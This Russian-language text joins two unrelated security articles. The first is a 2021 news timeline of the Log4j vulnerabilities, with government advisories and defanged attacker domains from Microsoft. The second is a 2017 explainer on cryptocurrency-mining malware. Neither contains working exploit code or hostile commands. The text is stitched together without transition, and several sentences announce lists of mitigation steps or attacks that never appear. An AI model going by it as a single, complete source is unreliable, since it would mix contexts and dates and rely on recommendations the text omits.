Apache опубликовал подробности о критической уязвимости в Log4j — библиотеке журналирования, используемой в миллионах Java-приложений. Злоумышленники начали эксплуатировать ошибку (CVE-2021-44228), получившую название «Log4Shell», которая получила оценку 10 из 10 по шкале оценки уязвимостей CVSS. Она может привести к удалённому выполнению кода (RCE) на базовых серверах, работающих с уязвимыми приложениями. «Злоумышленник, который может контролировать сообщения журнала или параметры сообщений журнала, может выполнить произвольный код, загруженный с серверов LDAP, когда включена подстановка поиска сообщений», — написали разработчики Apache в уведомлении. Исправление проблемы стало доступно с выпуском Log4j 2.15.0, пока группы безопасности по всему миру работали над защитой своих организаций. Предприятиям настоятельно рекомендовали установить последнюю версию.
По мере того как последствия уязвимости продолжались, Национальный центр кибербезопасности Великобритании (NCSC) выпустил публичное предупреждение для британских компаний об ошибке и описал стратегии смягчения последствий. NCSC рекомендовал всем организациям немедленно установить последнее обновление везде, где, как известно, используется Log4j. «Это должно быть первым приоритетом для всех британских организаций, использующих программное обеспечение, которое, как известно, включает Log4j. Организации должны обновлять как программное обеспечение, выходящее в интернет, так и не выходящее в интернет», — говорилось в заявлении. Предприятиям также настоятельно рекомендовали выявлять неизвестные экземпляры Log4j и разворачивать защитный сетевой мониторинг/блокировку.
Как и NCSC Великобритании, Агентство США по кибербезопасности и защите инфраструктуры (CISA) публично отреагировало на уязвимость Log4j, а её директор Джен Истерли отметила безотлагательный вызов, который она представляет для защитников сетей. «CISA тесно работает с нашими партнёрами из государственного и частного секторов, чтобы активно устранять критическую уязвимость, затрагивающую продукты, содержащие библиотеку Log4j», — сказала она в заявлении. «Мы принимаем срочные меры для стимулирования смягчения последствий этой уязвимости и обнаружения любой связанной с ней угрозы. Мы добавили эту уязвимость в наш каталог известных эксплуатируемых уязвимостей, что обязывает федеральные гражданские агентства — и сигнализирует нефедеральным партнёрам — срочно установить исправление или устранить эту уязвимость. Мы активно обращаемся к организациям, чьи сети могут быть уязвимы, и используем наши инструменты сканирования и обнаружения вторжений, чтобы помочь правительственным и отраслевым партнёрам выявить подверженность уязвимости или её эксплуатацию».
CISA рекомендовала владельцам активов предпринять три дополнительных немедленных шага, чтобы помочь смягчить уязвимость:
Была обнаружена вторая уязвимость, затрагивающая Apache Log4j. Новый эксплойт, CVE 2021-45046, позволял злоумышленникам создавать вредоносные входные данные с использованием шаблона поиска JNDI для осуществления атак типа «отказ в обслуживании» (DoS), согласно описанию CVE. Был доступен новый патч для эксплойта, который удалил поддержку шаблонов поиска сообщений и отключил функциональность JNDI по умолчанию, поскольку исправление Log4j 2.15.0 для первоначальной ошибки было неполным в некоторых конфигурациях, не заданных по умолчанию.
«Хотя CVE-2021-45046 менее серьёзна, чем первоначальная уязвимость, она становится ещё одним вектором для злоумышленников, позволяющим проводить вредоносные атаки на системы без исправлений или с неправильными исправлениями», — рассказала CSO Эми Чанг, руководитель отдела рисков и реагирования в Resilience, вскоре после обнаружения ошибки. «Неполный патч для CVE-2021-44228 может быть использован для создания вредоносных входных данных, что может привести к DoS-атаке. DoS-атака может отключить машину или сеть и сделать её недоступной для предполагаемых пользователей», — добавила она. Организациям рекомендовалось как можно скорее обновиться до Log4j 2.16.0.
Apache опубликовал подробности о третьей крупной уязвимости Log4j и предоставил ещё одно исправление. Это была ошибка бесконечной рекурсии, оценённая в 7,5 из 10. «Команда Log4j была уведомлена об уязвимости безопасности, CVE-2021-45105, которая была устранена в Log4j 2.17.0 для Java 8 и выше», — написали они. «Версии Apache Log4j2 с 2.0-alpha1 по 2.16.0 не защищали от неконтролируемой рекурсии из самореферентных поисков. Когда конфигурация журналирования использует нестандартный шаблон PatternLayout с Context Lookup (например, $${ctx:loginId}), злоумышленники, контролирующие входные данные Thread Context Map (MDC), могут создать вредоносные входные данные, содержащие рекурсивный поиск, что приведёт к StackOverflowError, которая завершит процесс. Это также известно как DoS-атака (отказ в обслуживании)».
Apache также описал следующие меры смягчения последствий:
Исследовательская группа по кибербезопасности Cryptolaemus предупредила, что уязвимость Log4j используется для заражения устройств Windows банковским трояном Dridex, а устройств Linux — Meterpreter. Dridex — это форма вредоносного ПО, которое крадёт банковские учётные данные через систему, использующую макросы Microsoft Word, а Meterpreter — это полезная нагрузка атаки Metasploit, которая предоставляет интерактивную оболочку, из которой злоумышленник может исследовать целевую машину и выполнять код. Член Cryptolaemus Джозеф Розен сообщил BleepingComputer, что злоумышленники используют вариант эксплойта Log4j RMI (Remote Method Invocation), чтобы заставить уязвимые устройства загрузить и выполнить Java-класс с удалённого сервера, контролируемого злоумышленником.
Данные, опубликованные вендором в области кибербезопасности Tenable, показали, что один из десяти всех активов был уязвим для Log4Shell, в то время как 30% организаций ещё не начали сканирование на предмет этой ошибки. «Среди оценённых активов Log4Shell обнаружен примерно в 10% из них, включая широкий спектр серверов, веб-приложений, контейнеров и устройств Интернета вещей», — говорится в сообщении в блоге Tenable. «Log4Shell повсеместно распространён во всех отраслях и географиях. Один из десяти корпоративных серверов открыт. Одно из десяти веб-приложений и так далее. Один из десяти практически каждого аспекта нашей цифровой инфраструктуры имеет потенциал для злонамеренной эксплуатации через Log4Shell».
Вендор предупредил, что Log4Shell несёт в себе большую потенциальную угрозу, чем EternalBlue (использованный в атаках WannaCry), из-за повсеместного распространения Log4j как в инфраструктуре, так и в приложениях. «Ни одна уязвимость в истории так явно не требовала исправления. Log4Shell определит вычисления, как мы их знаем, разделив тех, кто приложил усилия для защиты себя, и тех, кому комфортно быть небрежными», — добавили они.
Федеральная торговая комиссия (FTC) призвала американские организации немедленно устранить уязвимость Log4Shell, иначе им грозят карательные меры со стороны ведомства. «Когда уязвимости обнаруживаются и эксплуатируются, возникает риск утраты или утечки персональных данных, финансовых потерь и другого необратимого вреда. Обязанность предпринимать разумные шаги по устранению известных уязвимостей программного обеспечения затрагивает, среди прочего, Закон о Федеральной торговой комиссии и Закон Грэмма-Лича-Блили», — заявила FTC. Ведомство добавило, что компаниям и их поставщикам, полагающимся на Log4j, крайне важно действовать сейчас, чтобы снизить вероятность причинения вреда потребителям и избежать судебных исков со стороны FTC. «FTC намерена использовать все свои законные полномочия для привлечения к ответственности компаний, которые не предпринимают разумных шагов для защиты данных потребителей от раскрытия в результате Log4j или аналогичных известных уязвимостей в будущем».
Microsoft обновила страницу с рекомендациями по устранению уязвимости Log4j, добавив сведения об операторе программ-вымогателей из Китая (DEV-0401), который нацелен на системы, доступные из интернета, и разворачивает программу-вымогатель NightSky. «Уже 4 января злоумышленники начали эксплуатировать уязвимость CVE-2021-44228 в доступных из интернета системах с VMware Horizon», — сообщается в публикации. «DEV-0401 ранее развертывал несколько семейств программ-вымогателей, включая LockFile, AtomSilo и Rook, а также аналогичным образом эксплуатировал доступные из интернета системы с Confluence (CVE-2021-26084) и локальные серверы Exchange (CVE-2021-34473)». Согласно анализу Microsoft, было обнаружено, что злоумышленники используют серверы управления и контроля (CnC), подделывающие легитимные домены. К ним относятся service[.]trendmrcio[.]com, api[.]rogerscorp[.]org, api[.]sophosantivirus[.]ga, apicon[.]nvidialab[.]us, w2zmii7kjb81pfj0ped16kg8szyvmk.burpcollaborator[.]net и 139[.]180[.]217[.]203.
Security 101: Влияние вредоносных программ для майнинга криптовалют
Правительство Австралии недавно признало цифровую валюту законным платёжным средством. С 1 июля покупки, совершаемые с использованием цифровых валют, таких как bitcoin, освобождаются от налога на товары и услуги страны, чтобы избежать двойного налогообложения. Таким образом, трейдеры и инвесторы не будут облагаться налогом за покупку и продажу цифровых валют через легальные обменные платформы.
Япония, которая легализовала bitcoin как платёжное средство в апреле прошлого года, уже ожидает, что более 20 000 продавцов начнут принимать bitcoin к оплате. К этой тенденции присоединяются и другие страны, хотя и частично: бизнес и некоторые общественные организации в Швейцарии, Норвегии и Нидерландах. Согласно недавнему исследованию, число уникальных активных пользователей криптовалютных кошельков оценивается в 2,9–5,8 миллиона, большинство из которых находятся в Северной Америке и Европе.
Но какое отношение принятие и распространение цифровых валют имеет к онлайн-угрозам? Самое прямое. По мере того как криптовалюты вроде bitcoin набирают популярность в реальном мире, будут расти и киберпреступные угрозы, злоупотребляющие ими. Но как именно? Что это значит для бизнеса и обычных пользователей?
Криптовалюта — это зашифрованная строка данных, обозначающая единицу валюты. Она контролируется и организуется пиринговой сетью, также известной как блокчейн, который служит защищённым реестром транзакций, например покупки, продажи и перевода. В отличие от физических денег, криптовалюты децентрализованы, а это значит, что они не выпускаются правительствами или другими финансовыми институтами.
Криптовалюты создаются (и защищаются) с помощью криптографических алгоритмов, которые поддерживаются и подтверждаются в процессе, называемом майнингом, где сеть компьютеров или специализированное оборудование, такое как интегральные схемы специального назначения (ASIC), обрабатывает и проверяет транзакции. Этот процесс вознаграждает майнеров, поддерживающих сеть, криптовалютой.
На самом деле существует более 700 криптовалют, но лишь некоторые активно торгуются, и ещё меньше имеют рыночную капитализацию выше $100 миллионов. Bitcoin, например, был создан Сатоши Накамото (псевдоним) и выпущен в 2009 году как open-source код. Технология блокчейна сделала всё это возможным, обеспечив систему, в которой структуры данных (блоки) распространяются, проверяются и регистрируются в публичной распределённой базе данных через сеть коммуникационных узлов (нод).
Хотя bitcoin — самая известная криптовалюта, существуют и другие популярные альтернативы. Ethereum вывел «смарт-контракты» на новый уровень, сделав языки программирования, необходимые для их написания, более доступными для разработчиков. Соглашения или условные транзакции (если—то) записываются в виде кода и исполняются (при выполнении требований) в блокчейне Ethereum.
Однако Ethereum приобрёл дурную славу после того, как хакер эксплуатировал уязвимость в Децентрализованной автономной организации (DAO), работавшей на программном обеспечении Ethereum, похитив эфир (валюту Ethereum) на сумму 50 миллионов долларов США. Это привело к созданию Ethereum Classic на основе исходного блокчейна и Ethereum — его обновлённой версии (через хард-форк).
Есть и другие заметные криптовалюты: Litecoin, Dogecoin, Monero. Litecoin — это якобы техническое усовершенствование Bitcoin, способное обеспечить более быстрые транзакции благодаря алгоритму майнинга Scrypt (Bitcoin использует SHA-256). Сеть Litecoin способна выпустить 84 миллиона Litecoin — в четыре раза больше, чем bitcoin. Monero примечателен использованием кольцевых подписей (тип цифровой подписи) и протокола прикладного уровня CryptoNote для защиты конфиденциальности своих транзакций — суммы, отправителя и получателя. Dogecoin, изначально разработанный в образовательных или развлекательных целях, был рассчитан на более широкую аудиторию. Способный генерировать неограниченное количество dogecoin, он также использует Scrypt для обеспечения работы валюты.
У криптовалют нет границ — любой может отправить их в любое время и в любом месте, без задержек и дополнительных/скрытых комиссий посредников. Благодаря своей природе они более защищены от мошенничества и кражи личных данных, поскольку криптовалюты невозможно подделать, а личная информация находится за криптографической стеной.
К сожалению, та же очевидная прибыльность, удобство и псевдонимность криптовалют сделали их идеальными и для киберпреступников, как показали операторы программ-вымогателей. Растущая популярность криптовалют совпадает с распространением вредоносных программ, которые заражают системы и устройства, превращая их в армии машин для майнинга криптовалют.
Майнинг криптовалют — это вычислительно интенсивная задача, требующая значительных ресурсов выделенных процессоров, видеокарт и другого оборудования. Хотя майнинг и приносит деньги, у него есть множество оговорок. Прибыль зависит от вложений майнера в оборудование, не говоря уже о затратах на электроэнергию для его питания.
Криптовалюты добываются блоками; например, в bitcoin каждый раз, когда решается определённое количество хешей, количество bitcoin, которое может быть вознаграждено майнеру за блок, уменьшается вдвое. Поскольку сеть bitcoin спроектирована так, чтобы генерировать криптовалюту каждые 10 минут, сложность решения очередного хеша корректируется. И по мере того как вычислительная мощность майнинга растёт, требования к ресурсам для добычи нового блока увеличиваются. Выплаты относительно невелики и со временем уменьшаются каждые четыре года — в 2016 году вознаграждение за добычу блока было уменьшено вдвое до 12,5 BTC (или $32 000 по состоянию на 5 июля 2017 года). Вследствие этого многие объединяются в пулы, чтобы сделать майнинг более эффективным. Прибыль делится между участниками группы в зависимости от того, сколько усилий вложил каждый майнер.
Злоумышленники обращаются к вредоносным программам, чтобы обойти эти трудности. Однако для киберпреступных майнеров есть одна оговорка: подключённые к интернету устройства и машины, хотя и достаточно быстры для обработки сетевых данных, не обладают значительными вычислительными возможностями. Чтобы компенсировать это, вредоносные программы для майнинга криптовалют созданы для превращения компьютеров в зомби- ботнеты для выполнения этих задач. Другие вовсе отказались от скрытности — в 2014 году суперкомпьютерный кластер Odyssey Гарварда был незаконно использован для майнинга dogecoin. В том же году аналогичный инцидент произошёл с суперкомпьютерами американского агентства National Science Foundation. В начале февраля 2017 года один из серверов Федеральной резервной системы США был неправомерно использован для майнинга bitcoin.
Вредоносные программы для майнинга криптовалют используют те же методы, что и многие другие угрозы — от спам-писем с вредоносными вложениями и загрузок с вредоносных URL до мусорных программ и потенциально нежелательных приложений (PUA). В январе 2014 года была скомпрометирована уязвимость в рекламной сети Yahoo! на базе Java, из-за чего европейские конечные пользователи столкнулись с вредоносной рекламой, доставлявшей вредоносную программу для майнинга bitcoin. За месяц до этого немецкие правоохранительные органы арестовали хакеров, которые, как предполагалось, использовали вредоносные программы для майнинга bitcoin на сумму более $954 000.
Мы наблюдали появление хакерских инструментов и бэкдоров, связанных с киберпреступным майнингом bitcoin, ещё в 2011 году, и с тех пор мы видим множество угроз для майнинга криптовалют с дополнительными возможностями, такими как распределённый отказ в обслуживании и подмена URL. Другая угроза даже пыталась замаскироваться под компонент одного из продуктов Trend Micro. В 2014 году угроза перекинулась на устройства Android как Kagecoin, способная добывать bitcoin, litecoin и dogecoin. Троян удалённого доступа (RAT) njrat/Njw0rm, широко распространённый на андеграундных форумах Ближнего Востока, был модифицирован для добавления функции майнинга bitcoin. То же самое было сделано со старым Java RAT, способным добывать litecoin.
Наиболее заметными вредоносными программами для майнинга криптовалют в этом году пока являются Adylkuzz, CPUMiner/EternalMiner и Linux.MulDrop.14. Все они эксплуатируют уязвимости. Adylkuzz использует EternalBlue — ту же уязвимость, которую программа-вымогатель WannaCry использовала с разрушительным эффектом, тогда как CPUMiner/EternalMiner использовал SambaCry — уязвимость в пакете программ для совместимости Samba. Linux.MulDrop.14, троян для Linux, нацелен на устройства Raspberry Pi. Эти угрозы заражали устройства и машины, превращая их в ботнеты для майнинга monero.
Вредоносные программы для майнинга криптовалют похищают ресурсы заражённых машин, значительно снижая их производительность и увеличивая их износ. Заражение также влечёт за собой другие расходы, например повышенное потребление электроэнергии.
Но мы также обнаружили, что их воздействие выходит за рамки проблем с производительностью. С 1 января по 24 июня 2017 года наши сенсоры обнаружили 4 894 майнера bitcoin, которые инициировали более 460 259 операций по майнингу bitcoin, и выяснили, что более 20% этих майнеров также инициировали веб-атаки и атаки на сетевом уровне. Мы даже обнаружили попытки вторжения, связанные с вектором атаки программы-вымогателя. Наиболее распространёнными из этих атак были:
Эти вредоносные программы могут угрожать доступности, целостности и безопасности сети или системы, что потенциально может привести к сбоям в критически важных операциях предприятия. Кража информации и захват системы также являются серьёзными последствиями. Эти атаки также могут служить каналом для доставки дополнительных вредоносных программ.
Устройства Интернета вещей (IoT) также находятся на прицеле вредоносных программ для майнинга криптовалют — от цифровых видеорегистраторов (DVR)/камер видеонаблюдения, телевизионных приставок, сетевых хранилищ (NAS) и особенно маршрутизаторов, учитывая их повсеместность в домашних и корпоративных средах. В апреле 2017 года появился вариант Mirai с возможностями майнинга bitcoin. Mirai приобрёл известность благодаря хаосу, который он причинил устройствам IoT, особенно домашним маршрутизаторам, используя их для вывода из строя высокопрофильных сайтов в прошлом году. За первые три квартала 2016 года мы обнаружили армию зомби для майнинга bitcoin, состоящую из систем Windows, домашних маршрутизаторов и IP-камер.
С 1 января по 24 июня 2017 года мы также наблюдали различные виды устройств, занимавшихся майнингом bitcoin, хотя наша телеметрия не может подтвердить, были ли эти действия авторизованы. Мы также наблюдали рост активности майнинга bitcoin на 40%: с 1 800 событий в день в феврале до 3 000 в марте 2017 года.
Хотя майнинг bitcoin сам по себе не является незаконным (по крайней мере во многих странах), он может означать компрометацию, если происходит без ведома и согласия владельца. Мы обнаружили, что наибольшая активность по майнингу bitcoin наблюдалась на машинах под управлением Windows, но также стоит отметить:
[ЧИТАЙТЕ: Как защитить маршрутизатор от Mirai и атак на домашнюю сеть]
Вредоносные программы для майнинга криптовалют могут ухудшить производительность системы и подвергнуть конечных пользователей и бизнес риску кражи информации, захвата системы и множества других вредоносных программ. А превращая эти машины в зомби, криптовалютные вредоносные программы могут даже непреднамеренно сделать своих жертв частью проблемы.
Действительно, их негативное воздействие на заражаемые устройства — а в конечном счёте на активы бизнеса или данные пользователя — делает их реальной угрозой. Серебряной пули против этих вредоносных программ не существует, но их можно сдержать, следуя следующим рекомендациям:
ИТ/системные администраторы и специалисты по информационной безопасности также могут рассмотреть внесение приложений в белый список или аналогичные механизмы безопасности, предотвращающие запуск или установку подозрительных исполняемых файлов. Активный мониторинг сетевого трафика помогает лучше выявлять тревожные сигналы, которые могут указывать на заражение вредоносным ПО. Применение принципа наименьших привилегий, разработка контрмер против веб-инъекций, защита почтового шлюза, внедрение лучших практик для корпоративных мобильных устройств и формирование кадров, осведомленных о кибербезопасности, являются частью эшелонированной защиты, снижающей подверженность предприятия этим угрозам. Однако в конечном счете безопасность подключенных к интернету устройств от вредоносного ПО для криптовалютного майнинга — это не только бремя их пользователей. Производители оригинального дизайна и оборудования также играют важнейшую роль в обеспечении безопасности экосистем в которых эти устройства работают.